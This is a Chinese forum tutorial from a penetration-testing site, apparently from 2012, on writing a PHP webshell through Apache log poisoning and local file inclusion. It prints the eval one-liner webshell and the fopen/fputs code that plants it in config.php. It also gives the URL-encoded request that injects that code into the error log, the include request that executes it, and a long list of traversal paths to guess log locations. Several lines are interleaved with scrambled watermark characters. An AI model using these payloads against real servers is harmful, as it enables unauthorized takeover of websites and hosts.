中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
! J; L# G  M  G' {. X* P1 I  I
# ?' a- A" R  H# R  A比如还是这句一句话木马 ( t3 P* {4 [- T% o$ ?
<?eval($_POST[cmd]);?>   # s: ]2 m, x" M! W$ k' x8 t

0 q2 i! U$ C& ?/ _8 Q) t; D! Y; V到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 7 w4 q, O+ e5 F( e0 M  z
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
: m+ Y9 p( F0 ^; M. Y. t  b
- d  g" L' k6 I<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 6 g, w  \0 c$ ?$ K& s
fclose($fp);?>   //在config.php里写入一句木马语句
* }: {6 O( J* w% s$ x& r' V' N6 I$ X# G( c9 d3 m
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
# v% {. @# D: G% x) u转换为 * H( D$ E' m5 s: i2 m
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F ( U  u. G3 @0 S% u+ @# S0 Y9 R
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp # y3 M. G, m5 O7 a* R
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
* k2 E$ G( a7 H0 Qfclose%28%24fp%29%3B%3F%3E
6 X( {8 [4 W3 d# _& G5 F8 E我们提交 9 p( Y% r& `6 Q  X; y4 P
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww , ?: k1 H0 m. b/ u- ^5 ^
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
7 r; C' d# o% g6 N' b%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
+ U* y3 |& j. K! S+ }/ f4 Y7 ncmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 8 R8 r7 z) y/ w) Z% V
6 D/ @% P! W9 J- P; d: N4 V# p
这样就错误日志里就记录下了这行写入webshell的代码。 ; ^5 r, W" m& G( Y! V5 k
我们再来包含日志,提交
. s5 V8 {9 x+ X! [0 n0 k% Phttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log : d4 U9 d/ V7 v

2 P- |4 e- f/ ]$ ]1 z这样webshell就写入成功了,config.php里就写入一句木马语句
" k( ]0 I" A5 b& ?OK. 4 K4 l" M3 `$ D1 O, Z6 P: j2 q
http://www.xxx.com/forum/config.php这个就成了我们的webshell 9 I6 l- x8 p- A' u  ]: b& l( Y; W# m
直接用lanker的客户端一连,主机就是你的了。 7 z( O; M  y* S: a; E, L% D
2 L* P" |0 L- z2 k% B  G" ^
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
2 f& v! J, X$ V5 g) o
/ [4 R% u4 P5 J( E# f其他的日志路径,你可以去猜,也可以参照这里。
( {5 g) G; q7 u8 R% @../../../../../../../../../../var/log/httpd/access_log : G# e9 f  N6 g& ^. j3 u
../../../../../../../../../../var/log/httpd/error_log
4 f: r1 ?5 v1 [& {1 c5 n) d../apache/logs/error.log
" A" @  ]+ L) n0 X: c../apache/logs/access.log / Y9 n; k) e+ y
../../apache/logs/error.log - B6 v+ t8 P7 }0 }4 h4 h
../../apache/logs/access.log ! g- f7 v# I1 N
../../../apache/logs/error.log
1 z; P/ A1 X, t  I( B+ A../../../apache/logs/access.log
+ r) {8 S, t2 E: j- a: }+ D0 M../../../../../../../../../../etc/httpd/logs/acces_log 6 `3 {4 m* {& R, p; s! K" ]
../../../../../../../../../../etc/httpd/logs/acces.log , C7 h/ B; B# z+ @9 P
../../../../../../../../../../etc/httpd/logs/error_log
% l0 K# o; P* K  D* |  E../../../../../../../../../../etc/httpd/logs/error.log 2 f3 u* v6 E# y
../../../../../../../../../../var/www/logs/access_log
5 S+ Z! q* R0 G../../../../../../../../../../var/www/logs/access.log
/ l1 \0 z, u  w3 W1 t, ^+ V../../../../../../../../../../usr/local/apache/logs/access_log
& e( T4 U) Y' a* y, L0 Y7 H$ [/ @../../../../../../../../../../usr/local/apache/logs/access.log $ Y) A( n; l! w0 U7 d% A4 d) }4 q
../../../../../../../../../../var/log/apache/access_log + a3 h6 }3 s/ z+ p0 @
../../../../../../../../../../var/log/apache/access.log 0 G) J- G) I( j, L
../../../../../../../../../../var/log/access_log   ~! A+ i9 h7 o- `% ~9 O1 r! m
../../../../../../../../../../var/www/logs/error_log
9 F9 A8 x& B3 w  w: F1 m1 T0 n../../../../../../../../../../var/www/logs/error.log
+ R- Z$ d" _" ^6 a$ F../../../../../../../../../../usr/local/apache/logs/error_log : H- E3 p2 l  I& p. t4 j
../../../../../../../../../../usr/local/apache/logs/error.log / |( ~9 z( o. y0 P. q4 o
../../../../../../../../../../var/log/apache/error_log : h; \/ {' @1 M! }) I, z
../../../../../../../../../../var/log/apache/error.log
% g9 E4 q$ Q8 @: Y% K5 ^../../../../../../../../../../var/log/access_log - l, w. e* F. j# l
../../../../../../../../../../var/log/error_log / x8 q+ W& O, L& y6 X$ u7 R/ V
/var/log/httpd/access_log      
! x3 o! s' x: o; z0 @* ~& j# z/var/log/httpd/error_log     
8 T, B  \" Z6 \( ~3 Z7 M$ b../apache/logs/error.log     
* C' @- V; M+ L9 ^  z# |+ V../apache/logs/access.log ( V" I- S2 ]$ H& N
../../apache/logs/error.log ) ?# u$ }+ G8 ]7 a% {
../../apache/logs/access.log
9 l) |; \( t  K& K7 T../../../apache/logs/error.log
. l, f+ C+ d, e: J2 U( j' v../../../apache/logs/access.log / N, z+ p9 I4 Q& Y
/etc/httpd/logs/acces_log & ?( d: j  a, B" m
/etc/httpd/logs/acces.log
* Z. Z% B  ?; T; I* x# C/ |/etc/httpd/logs/error_log
& o5 M! Z- @  A  ^! u% \9 [! P/etc/httpd/logs/error.log
4 `6 O, N" i$ y; S- ?/var/www/logs/access_log ! \9 U! {- ]1 {. @2 r3 }
/var/www/logs/access.log $ o9 R7 N( o% X: ^
/usr/local/apache/logs/access_log . o8 q1 `. ?# `+ c5 m* G3 p
/usr/local/apache/logs/access.log 7 ^$ K8 j6 e! k4 ~" c
/var/log/apache/access_log 7 {" u" Q8 v- _* v4 b$ M
/var/log/apache/access.log . e+ d7 R# V. G% R* x  `8 M
/var/log/access_log
, B2 w$ O0 P+ Z: z/var/www/logs/error_log
4 _% }; \) ^6 }3 ]/var/www/logs/error.log 8 i0 ?7 O3 j1 P( y
/usr/local/apache/logs/error_log
7 z8 @& w( S$ H5 s; v$ N- G3 n- N- a/usr/local/apache/logs/error.log & R8 q9 d9 _: x7 x& d0 n" \
/var/log/apache/error_log
3 J* ~/ {, g9 D/var/log/apache/error.log
: {8 e' i" H" a1 |. i/var/log/access_log
4 g" y6 W+ B- k4 u1 \8 l+ d/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2